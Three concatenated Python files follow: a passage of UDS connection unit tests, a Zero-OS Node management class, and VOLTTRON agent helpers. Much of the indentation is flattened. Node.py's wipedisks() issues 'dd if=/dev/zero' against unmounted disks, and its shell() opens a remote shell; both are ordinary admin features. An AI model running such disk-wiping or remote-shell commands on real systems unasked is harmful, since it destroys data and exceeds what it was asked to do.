self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
        while self.sock1 is None:
            if (time.time() - t1) > 0.5:
                raise RuntimeError('Timeout while connecting sockets together.')
            time.sleep(0.01)
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(not _STACK_POSSIBLE, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNAVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
|
Node.py | import time
from collections import namedtuple
from datetime import datetime
from io import BytesIO
import netaddr
import redis
import uuid
import threading
from Jumpscale import j
from ..capacity.Capacity import Capacity
from ..container.Container import Containers
from ..disks.Disks import Disks, StorageType
from ..healthchecks.healthcheck import HealthCheck
from ..network.Network import Network
from ..storage.StoragePool import StoragePools
from ..gateway import Gateways
from ..zerodb import Zerodbs
from ..primitives.Primitives import Primitives
from ..hypervisor.Hypervisor import Hypervisor
from ..utils import get_ip_from_nic, get_zt_ip
Mount = namedtuple("Mount", ["device", "mountpoint", "fstype", "options"])
SUPPORT_NETWORK = "172.29.0.0/16"
ZOS_CACHE = "zos-cache"
class Node:
"""Represent a Zero-OS Server"""
def __init__(self, client):
# g8os client to talk to the node
self._storage_addr = None
self._node_id = None
self.disks = Disks(self)
self.storagepools = StoragePools(self)
self.containers = Containers(self)
self.gateways = Gateways(self)
self.zerodbs = Zerodbs(self)
self.primitives = Primitives(self)
self.hypervisor = Hypervisor(self)
self.network = Network(self)
self.healthcheck = HealthCheck(self)
self.capacity = Capacity(self)
self.client = client
@property
def addr(self):
return self.client.host
@property
def port(self):
return self.client.port
def ping(self):
return self.client.ping()
@property
def node_id(self):
if self._node_id is None:
nics = self.client.info.nic()
macgwdev, _ = self.get_nic_hwaddr_and_ip(nics)
if not macgwdev:
raise AttributeError("name not found for node {}".format(self))
self._node_id = macgwdev.replace(":", "")
return self._node_id
@property
def kernel_args(self):
args = self.download_content("/proc/cmdline").split()
result = dict()
for arg in args:
split = arg.split("=")
value = split[1] if len(split) > 1 else ""
result[split[0]] = value
return result
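    # Example (comment only): a kernel cmdline such as
    #   "console=tty0 zerotier=abcdef quiet"
    # is parsed by kernel_args into
    #   {"console": "tty0", "zerotier": "abcdef", "quiet": ""}
    # where flag-style arguments map to an empty string.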
def shell(self):
"""
        Starts a pseudo-interactive ash shell.
        Full line commands can be sent to the shell (no tab completion or other fanciness though)
"""
fifofile = "/tmp/{}".format(uuid.uuid4())
self.client.system("mkfifo {}".format(fifofile))
proc = self.client.bash("ash < {}".format(fifofile), stream=True)
reader = threading.Thread(target=proc.stream)
reader.start()
writer = self.client.filesystem.open(fifofile, "w")
while True:
try:
cmd = input("# ").encode("utf-8")
except EOFError:
break
if cmd:
self.client.filesystem.write(writer, cmd + b";pwd\n")
self.client.filesystem.close(writer)
self.client.filesystem.remove(fifofile)
self.client.job.kill(proc.id, 9)
@property
def storage_addr(self):
if not self._storage_addr:
nic_data = self.client.info.nic()
for nic in nic_data:
if nic["name"] == "backplane":
self._storage_addr = get_ip_from_nic(nic["addrs"])
return self._storage_addr
self._storage_addr = self.public_addr
return self._storage_addr
@property
def storageAddr(self):
j.tools.logger._log_warning("storageAddr is deprecated, use storage_addr instead")
return self.storage_addr
@property
def public_addr(self):
nics = self.client.info.nic()
ip = get_zt_ip(nics, False, SUPPORT_NETWORK)
if ip:
return ip
_, ip = self.get_nic_hwaddr_and_ip(nics)
return ip
@property
def support_address(self):
nics = self.client.info.nic()
ip = get_zt_ip(nics, True, SUPPORT_NETWORK)
if ip:
return ip
raise j.exceptions.NotFound("their is no support zerotier interface (support_address)")
@property
def management_address(self):
return self.public_addr
def generate_zerotier_identity(self):
return self.client.system("zerotier-idtool generate").get().stdout.strip()
def get_gateway_route(self):
for route in self.client.ip.route.list():
if route["gw"] and not route["dst"]:
return route
raise j.exceptions.NotFound("Could not find route with default gw")
def get_gateway_nic(self):
return self.get_gateway_route()["dev"]
def get_nic_hwaddr_and_ip(self, nics=None, name=None):
if nics is None:
nics = self.client.info.nic()
if not name:
name = self.get_gateway_nic()
for nic in nics:
if nic["name"] == name:
return nic["hardwareaddr"], get_ip_from_nic(nic["addrs"])
return "", ""
def get_nic_by_ip(self, addr):
try:
res = next(
nic for nic in self.client.info.nic() if any(addr == a["addr"].split("/")[0] for a in nic["addrs"])
)
return res
except StopIteration:
return None
def _eligible_zeroos_cache_disk(self, disks):
"""
return the first disk that is eligible to be used as filesystem cache
        First try to find an SSD disk, then an HDD, and finally an NVMe disk
"""
priorities = [StorageType.SSD, StorageType.HDD, StorageType.NVME]
eligible = {t: [] for t in priorities}
# Pick up the first ssd
usedisks = []
for pool in self.client.btrfs.list() or []:
for device in pool["devices"]:
usedisks.append(device["path"])
for disk in disks[::-1]:
if disk.devicename in usedisks or len(disk.partitions) > 0 or disk.transport == "usb":
continue
if disk.type in priorities:
eligible[disk.type].append(disk)
# pick up the first disk according to priorities
for t in priorities:
if eligible[t]:
return eligible[t][0]
else:
raise j.exceptions.Base("cannot find eligible disks for the fs cache")
def find_disks(self, disk_type):
"""
        return a dict, keyed by node id, of disks that match the requested
        type and are not yet in use (no filesystems and no partitions)
"""
available_disks = {}
for disk in self.disks.list():
# skip disks of wrong type
if disk.type.name != disk_type:
continue
# skip devices which have filesystems on the device
if len(disk.filesystems) > 0:
continue
            # only include devices which have no partitions
if len(disk.partitions) == 0:
available_disks.setdefault(self.node_id, []).append(disk)
return available_disks
def _mount_zeroos_cache(self, storagepool):
"""
        mount the zeroos_cache storage pool and copy the content of the in-memory fs inside
"""
mountedpaths = [mount.mountpoint for mount in self.list_mounts()]
def create_cache_dir(path, name):
self.client.filesystem.mkdir(path)
if path not in mountedpaths:
if storagepool.exists(name):
storagepool.get(name).delete()
fs = storagepool.create(name)
self.client.disk.mount(storagepool.devicename, path, ["subvol={}".format(fs.subvolume)])
create_cache_dir("/var/cache/containers", "containercache")
create_cache_dir("/var/cache/vm", "vmcache")
logpath = "/var/log"
if logpath not in mountedpaths:
            # logs is an empty filesystem on which we create a snapshot to store the logs of the current boot
snapname = "{:%Y-%m-%d-%H-%M}".format(datetime.now())
fs = storagepool.get("logs")
snapshot = fs.create(snapname)
self.client.bash("mkdir /tmp/log && mv /var/log/* /tmp/log/")
self.client.disk.mount(storagepool.devicename, logpath, ["subvol={}".format(snapshot.subvolume)])
self.client.bash("mv /tmp/log/* /var/log/").get()
self.client.log_manager.reopen()
# startup syslogd and klogd
self.client.system("syslogd -n -O /var/log/messages")
self.client.system("klogd -n")
def freeports(self, nrports=1):
"""
        Find and reserve the requested number of free ports on the node.
The system detects the local listening ports, plus the ports used for other port forwards, and finally the reserved ports
The system tries to find the first free port in the valid ports range.
:param nrports: Amount of free ports to find
:type nrports: int
:return: list if ports that are free
:rtype: list(int)
"""
return self.client.socat.reserve(number=nrports)
def find_persistance(self, name=None):
if not name:
name = ZOS_CACHE
zeroos_cache_sp = None
for sp in self.storagepools.list():
if sp.name == name:
zeroos_cache_sp = sp
break
return zeroos_cache_sp
def is_configured(self, name="zos-cache"):
zeroos_cache_sp = self.find_persistance(name)
if zeroos_cache_sp is None:
return False
return bool(zeroos_cache_sp.mountpoint)
def ensure_persistance(self, name="zos-cache"):
"""
look for a disk not used,
create a partition and mount it to be used as cache for the g8ufs
set the label `zos-cache` to the partition
"""
disks = self.disks.list()
        if not disks:
# if no disks, we can't do anything
return
# check if there is already a storage pool with the fs_cache label
zeroos_cache_sp = self.find_persistance(name)
# create the storage pool if we don't have one yet
if zeroos_cache_sp is None:
disk = self._eligible_zeroos_cache_disk(disks)
zeroos_cache_sp = self.storagepools.create(
name, device=disk.devicename, metadata_profile="single", data_profile="single", overwrite=True
)
zeroos_cache_sp.mount()
try:
zeroos_cache_sp.get("logs")
except ValueError:
zeroos_cache_sp.create("logs")
# mount the storage pool
self._mount_zeroos_cache(zeroos_cache_sp)
return zeroos_cache_sp
def download_content(self, remote):
buff = BytesIO()
self.client.filesystem.download(remote, buff)
return buff.getvalue().decode()
def upload_content(self, remote, content):
if isinstance(content, str):
content = content.encode("utf8")
        buff = BytesIO(content)
        self.client.filesystem.upload(remote, buff)
def wipedisks(self):
j.tools.logger._log_debug("Wiping node {hostname}".format(**self.client.info.os()))
jobs = []
# for disk in self.client.disk.list():
for disk in self.disks.list():
if disk.type == StorageType.CDROM:
j.tools.logger._log_debug(" * Not wiping cdrom {kname} {model}".format(**disk._disk_info))
continue
if disk.transport == "usb":
j.tools.logger._log_debug(" * Not wiping usb {kname} {model}".format(**disk._disk_info))
continue
if not disk.mountpoint:
for part in disk.partitions:
if part.mountpoint:
j.tools.logger._log_debug(
" * Not wiping {device} because {part} is mounted at {mountpoint}".format(
device=disk.devicename, part=part.devicename, mountpoint=part.mountpoint
)
)
break
else:
j.tools.logger._log_debug(" * Wiping disk {kname}".format(**disk._disk_info))
jobs.append(self.client.system("dd if=/dev/zero of={} bs=1M count=50".format(disk.devicename)))
else:
j.tools.logger._log_debug(
" * Not wiping {device} mounted at {mountpoint}".format(
device=disk.devicename, mountpoint=disk.mountpoint
)
)
# wait for wiping to complete
for job in jobs:
job.get()
def list_mounts(self):
allmounts = []
for mount in self.client.info.disk():
allmounts.append(Mount(mount["device"], mount["mountpoint"], mount["fstype"], mount["opts"]))
return allmounts
def get_mount_path(self, path):
"""
Get the parent mountpoint for a path
:param path: path you want to retrieve the mountpoint for
:type path: str
:rtype: str
:return: path to the mountpoint
"""
bestmatch = "/"
for mount in self.list_mounts():
            if path.startswith(mount.mountpoint) and len(mount.mountpoint) > len(bestmatch):
bestmatch = mount.mountpoint
return bestmatch
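    # Example (comment only): with mounts at "/" and "/var/cache", a call like
    #   node.get_mount_path("/var/cache/containers/foo")
    # returns "/var/cache", the longest mountpoint that prefixes the path.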
def is_running(self, timeout=30):
state = False
start = time.time()
err = None
while time.time() < start + timeout:
try:
self.client.testConnectionAttempts = 0
state = self.client.ping()
break
except (RuntimeError, ConnectionError, redis.ConnectionError, redis.TimeoutError, TimeoutError) as error:
err = error
time.sleep(1)
else:
j.tools.logger._log_debug("Could not ping %s within 30 seconds due to %s" % (self.addr, err))
return state
def uptime(self):
response = self.client.system("cat /proc/uptime").get()
output = response.stdout.split(" ")
return float(output[0])
def reboot(self):
self.client.raw("core.reboot", {})
def __str__(self):
return "Node <{host}:{port}>".format(host=self.addr, port=self.port)
def __repr__(self):
return str(self)
def __eq__(self, other):
a = "{}:{}".format(self.addr, self.port)
b = "{}:{}".format(other.addr, other.port)
return a == b
def __hash__(self):
return hash((self.addr, self.port))
|
utils.py | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2017, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""VOLTTRON platform™ agent helper classes/functions."""
import argparse
import calendar
import errno
import logging
import sys
import syslog
import traceback
from datetime import datetime, tzinfo, timedelta
import gevent
import os
import pytz
import re
import stat
import time
from volttron.platform import get_home, get_address
from dateutil.parser import parse
from dateutil.tz import tzutc, tzoffset
from tzlocal import get_localzone
from volttron.platform.agent import json as jsonapi
try:
from ..lib.inotify.green import inotify, IN_MODIFY
except AttributeError:
# inotify library is not available on OS X/MacOS.
# @TODO Integrate with the OS X FS Events API
inotify = None
IN_MODIFY = None
__all__ = ['load_config', 'run_agent', 'start_agent_thread',
'is_valid_identity']
__author__ = 'Brandon Carpenter <brandon.carpenter@pnnl.gov>'
__copyright__ = 'Copyright (c) 2016, Battelle Memorial Institute'
__license__ = 'FreeBSD'
_comment_re = re.compile(
r'((["\'])(?:\\?.)*?\2)|(/\*.*?\*/)|((?:#|//).*?(?=\n|$))',
re.MULTILINE | re.DOTALL)
_log = logging.getLogger(__name__)
# The following are the only allowable characters for identities.
_VALID_IDENTITY_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")
def is_valid_identity(identity_to_check):
""" Checks the passed identity to see if it contains invalid characters
A None value for identity_to_check will return False
@:param: string: The vip_identity to check for validity
@:return: boolean: True if values are in the set of valid characters.
"""
if identity_to_check is None:
return False
return _VALID_IDENTITY_RE.match(identity_to_check)
def normalize_identity(pre_identity):
if is_valid_identity(pre_identity):
return pre_identity
if pre_identity is None:
raise ValueError("Identity cannot be none.")
norm = ""
for s in pre_identity:
if _VALID_IDENTITY_RE.match(s):
norm += s
else:
norm += '_'
return norm
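# Example (comment only): normalize_identity replaces every character outside
# [A-Za-z0-9_.-] with an underscore, e.g.
#   normalize_identity("my agent#1") -> "my_agent_1"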
def _repl(match):
"""Replace the matched group with an appropriate string."""
# If the first group matched, a quoted string was matched and should
# be returned unchanged. Otherwise a comment was matched and the
# empty string should be returned.
return match.group(1) or ''
def strip_comments(string):
"""Return string with all comments stripped.
Both JavaScript-style comments (//... and /*...*/) and hash (#...)
comments are removed.
"""
return _comment_re.sub(_repl, string)
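# Example (comment only; the sample string is made up for illustration):
#   strip_comments('{"host": "localhost", /* inline */ "port": 8080} // x')
# returns '{"host": "localhost",  "port": 8080} ' with both comment styles
# removed while quoted strings are left untouched.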
def load_config(config_path):
"""Load a JSON-encoded configuration file."""
if config_path is None:
_log.info("AGENT_CONFIG does not exist in environment. load_config returning empty configuration.")
return {}
if not os.path.exists(config_path):
_log.info("Config file specified by AGENT_CONFIG does not exist. load_config returning empty configuration.")
return {}
try:
with open(config_path) as f:
return parse_json_config(f.read())
    except Exception:
_log.error("Problem parsing agent configuration")
raise
def update_kwargs_with_config(kwargs, config):
"""
Loads the user defined configurations into kwargs.
1. Converts any dash/hyphen in config variables into underscores
2. Checks for configured "identity" value. Prints a deprecation
warning and uses it.
3. Checks for configured "agentid" value. Prints a deprecation warning
and ignores it
:param kwargs: kwargs to be updated
:param config: dictionary of user/agent configuration
"""
if config.get('identity') is not None:
_log.warning("DEPRECATION WARNING: Setting a historian's VIP IDENTITY"
" from its configuration file will no longer be supported"
" after VOLTTRON 4.0")
_log.warning(
"DEPRECATION WARNING: Using the identity configuration setting "
"will override the value provided by the platform. This new value "
"will not be reported correctly by 'volttron-ctl status'")
_log.warning("DEPRECATION WARNING: Please remove 'identity' from your "
"configuration file and use the new method provided by "
"the platform to set an agent's identity. See "
"scripts/core/make-mongo-historian.sh for an example of "
"how this is done.")
if config.get('agentid') is not None:
_log.warning("WARNING: Agent id cannot be configured. It is a unique "
"id assigned by VOLTTRON platform. Ignoring configured "
"agentid")
config.pop('agentid')
for k, v in config.items():
kwargs[k.replace("-","_")] = v
def parse_json_config(config_str):
"""Parse a JSON-encoded configuration file."""
return jsonapi.loads(strip_comments(config_str))
def run_agent(cls, subscribe_address=None, publish_address=None,
config_path=None, **kwargs):
"""Instantiate an agent and run it in the current thread.
Attempts to get keyword parameters from the environment if they
are not set.
"""
if not subscribe_address:
subscribe_address = os.environ.get('AGENT_SUB_ADDR')
if subscribe_address:
kwargs['subscribe_address'] = subscribe_address
if not publish_address:
publish_address = os.environ.get('AGENT_PUB_ADDR')
if publish_address:
kwargs['publish_address'] = publish_address
if not config_path:
config_path = os.environ.get('AGENT_CONFIG')
if config_path:
kwargs['config_path'] = config_path
agent = cls(**kwargs)
agent.run()
def start_agent_thread(cls, **kwargs):
"""Instantiate an agent class and run it in a new daemon thread.
Returns the thread object.
"""
import threading
agent = cls(**kwargs)
thread = threading.Thread(target=agent.run)
thread.daemon = True
thread.start()
return thread
def isapipe(fd):
fd = getattr(fd, 'fileno', lambda: fd)()
return stat.S_ISFIFO(os.fstat(fd).st_mode)
def default_main(agent_class, description=None, argv=sys.argv,
parser_class=argparse.ArgumentParser, **kwargs):
"""Default main entry point implementation for legacy agents.
    description and parser_class are deprecated. Please avoid using them.
"""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
try:
sub_addr = os.environ['AGENT_SUB_ADDR']
pub_addr = os.environ['AGENT_PUB_ADDR']
except KeyError as exc:
sys.stderr.write(
'missing environment variable: {}\n'.format(exc.args[0]))
sys.exit(1)
if sub_addr.startswith('ipc://') and sub_addr[6:7] != '@':
if not os.path.exists(sub_addr[6:]):
sys.stderr.write('warning: subscription socket does not '
'exist: {}\n'.format(sub_addr[6:]))
if pub_addr.startswith('ipc://') and pub_addr[6:7] != '@':
if not os.path.exists(pub_addr[6:]):
sys.stderr.write('warning: publish socket does not '
'exist: {}\n'.format(pub_addr[6:]))
config = os.environ.get('AGENT_CONFIG')
agent = agent_class(subscribe_address=sub_addr,
publish_address=pub_addr,
config_path=config, **kwargs)
agent.run()
except KeyboardInterrupt:
pass
def vip_main(agent_class, identity=None, version='0.1', **kwargs):
"""Default main entry point implementation for VIP agents."""
try:
# If stdout is a pipe, re-open it line buffered
if isapipe(sys.stdout):
# Hold a reference to the previous file object so it doesn't
# get garbage collected and close the underlying descriptor.
stdout = sys.stdout
sys.stdout = os.fdopen(stdout.fileno(), 'w', 1)
# Quiet printing of KeyboardInterrupt by greenlets
Hub = gevent.hub.Hub
Hub.NOT_ERROR = Hub.NOT_ERROR + (KeyboardInterrupt,)
config = os.environ.get('AGENT_CONFIG')
identity = os.environ.get('AGENT_VIP_IDENTITY', identity)
if identity is not None:
if not is_valid_identity(identity):
                _log.warning('Deprecation warning')
                _log.warning(
                    'Not all characters in {identity} are in the valid set.'
                    .format(identity=identity))
address = get_address()
agent_uuid = os.environ.get('AGENT_UUID')
volttron_home = get_home()
agent = agent_class(config_path=config, identity=identity,
address=address, agent_uuid=agent_uuid,
volttron_home=volttron_home,
version=version, **kwargs)
try:
run = agent.run
except AttributeError:
run = agent.core.run
task = gevent.spawn(run)
try:
task.join()
finally:
task.kill()
except KeyboardInterrupt:
pass
class SyslogFormatter(logging.Formatter):
_level_map = {logging.DEBUG: syslog.LOG_DEBUG,
logging.INFO: syslog.LOG_INFO,
logging.WARNING: syslog.LOG_WARNING,
logging.ERROR: syslog.LOG_ERR,
logging.CRITICAL: syslog.LOG_CRIT}
def format(self, record):
level = self._level_map.get(record.levelno, syslog.LOG_INFO)
return '<{}>'.format(level) + super(SyslogFormatter, self).format(
record)
class JsonFormatter(logging.Formatter):
def format(self, record):
dct = record.__dict__.copy()
dct["msg"] = record.getMessage()
dct.pop('args')
exc_info = dct.pop('exc_info', None)
if exc_info:
dct['exc_text'] = ''.join(traceback.format_exception(*exc_info))
return jsonapi.dumps(dct)
class AgentFormatter(logging.Formatter):
def __init__(self, fmt=None, datefmt=None):
if fmt is None:
fmt = '%(asctime)s %(composite_name)s %(levelname)s: %(message)s'
super(AgentFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def composite_name(self, record):
if record.name == 'agents.log':
cname = '(%(processName)s %(process)d) %(remote_name)s'
elif record.name.startswith('agents.std'):
cname = '(%(processName)s %(process)d) <{}>'.format(
record.name.split('.', 2)[1])
else:
cname = '() %(name)s'
return cname % record.__dict__
def format(self, record):
if 'composite_name' not in record.__dict__:
record.__dict__['composite_name'] = self.composite_name(record)
if len(record.args) > 0 \
and 'tornado.access' in record.__dict__['composite_name']:
record.__dict__['msg'] = ','.join([str(b) for b in record.args])
record.__dict__['args'] = []
return super(AgentFormatter, self).format(record)
def setup_logging(level=logging.DEBUG):
root = logging.getLogger()
if not root.handlers:
handler = logging.StreamHandler()
if isapipe(sys.stderr) and '_LAUNCHED_BY_PLATFORM' in os.environ:
handler.setFormatter(JsonFormatter())
else:
fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
handler.setFormatter(logging.Formatter(fmt))
root.addHandler(handler)
root.setLevel(level)
def format_timestamp(time_stamp):
"""Create a consistent datetime string representation based on
ISO 8601 format.
YYYY-MM-DDTHH:MM:SS.mmmmmm for unaware datetime objects.
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM for aware datetime objects
:param time_stamp: value to convert
:type time_stamp: datetime
:returns: datetime in string format
:rtype: str
"""
time_str = time_stamp.strftime("%Y-%m-%dT%H:%M:%S.%f")
if time_stamp.tzinfo is not None:
sign = '+'
td = time_stamp.tzinfo.utcoffset(time_stamp)
if td.days < 0:
sign = '-'
td = -td
seconds = td.seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
time_str += "{sign}{HH:02}:{MM:02}".format(sign=sign,
HH=hours,
MM=minutes)
return time_str
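# Example (comment only): a naive datetime(2017, 5, 1, 12, 0) formats as
# "2017-05-01T12:00:00.000000", while the same instant made UTC-aware
# formats as "2017-05-01T12:00:00.000000+00:00".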
def parse_timestamp_string(time_stamp_str):
"""
Create a datetime object from the supplied date/time string.
Uses dateutil.parse with no extra parameters.
For performance reasons we try
YYYY-MM-DDTHH:MM:SS.mmmmmm
or
YYYY-MM-DDTHH:MM:SS.mmmmmm+HH:MM
based on the string length before falling back to dateutil.parse.
@param time_stamp_str:
@return: value to convert
"""
if len(time_stamp_str) == 26:
try:
return datetime.strptime(time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
except ValueError:
pass
elif len(time_stamp_str) == 32:
try:
base_time_stamp_str = time_stamp_str[:26]
time_zone_str = time_stamp_str[26:]
time_stamp = datetime.strptime(base_time_stamp_str, "%Y-%m-%dT%H:%M:%S.%f")
#Handle most common case.
if time_zone_str == "+00:00":
return time_stamp.replace(tzinfo=pytz.UTC)
hours_offset = int(time_zone_str[1:3])
minutes_offset = int(time_zone_str[4:6])
seconds_offset = hours_offset * 3600 + minutes_offset * 60
if time_zone_str[0] == "-":
seconds_offset = -seconds_offset
return time_stamp.replace(tzinfo=tzoffset("", seconds_offset))
except ValueError:
pass
return parse(time_stamp_str)
def get_aware_utc_now():
"""Create a timezone aware UTC datetime object from the system time.
:returns: an aware UTC datetime object
:rtype: datetime
"""
utcnow = datetime.utcnow()
utcnow = pytz.UTC.localize(utcnow)
return utcnow
def get_utc_seconds_from_epoch(timestamp=None):
"""
convert a given time stamp to seconds from epoch based on utc time. If
given time is naive datetime it is considered be local to where this
code is running.
@param timestamp: datetime object
@return: seconds from epoch
"""
if timestamp is None:
timestamp = datetime.now(tz=tzutc())
if timestamp.tzinfo is None:
local_tz = get_localzone()
# Do not use datetime.replace(tzinfo=local_tz) instead use localize()
timestamp = local_tz.localize(timestamp)
# utctimetuple can be called on aware timestamps and it will
# convert to UTC first.
seconds_from_epoch = calendar.timegm(timestamp.utctimetuple())
# timetuple loses microsecond accuracy so we have to put it back.
seconds_from_epoch += timestamp.microsecond / 1000000.0
return seconds_from_epoch
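# Example (comment only): an aware timestamp of 1970-01-01T00:01:00+00:00
# yields 60.0, and microseconds survive as the fractional part, so
# 1970-01-01T00:01:00.500000+00:00 yields 60.5.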
def process_timestamp(timestamp_string, topic=''):
"""
Convert timestamp string timezone aware utc timestamp
@param timestamp_string: datetime string to parse
@param topic: topic to which parse errors are published
@return: UTC datetime object and the original timezone of input datetime
"""
if timestamp_string is None:
_log.error("message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse_timestamp_string(timestamp_string)
except (ValueError, TypeError):
_log.error("message for {topic} bad timetamp string: {ts_string}"
.format(topic=topic, ts_string=timestamp_string))
return
if timestamp.tzinfo is None:
timestamp = timestamp.replace(tzinfo=pytz.UTC)
original_tz = None
else:
original_tz = timestamp.tzinfo
timestamp = timestamp.astimezone(pytz.UTC)
return timestamp, original_tz
def watch_file(fullpath, callback):
"""Run callback method whenever the file changes
Not available on OS X/MacOS.
"""
dirname, filename = os.path.split(fullpath)
if inotify is None:
_log.warning("Runtime changes to: %s not supported on this platform.", fullpath)
else:
with inotify() as inot:
inot.add_watch(dirname, IN_MODIFY)
for event in inot:
if event.name == filename and event.mask & IN_MODIFY:
callback()
def watch_file_with_fullpath(fullpath, callback):
"""Run callback method whenever the file changes
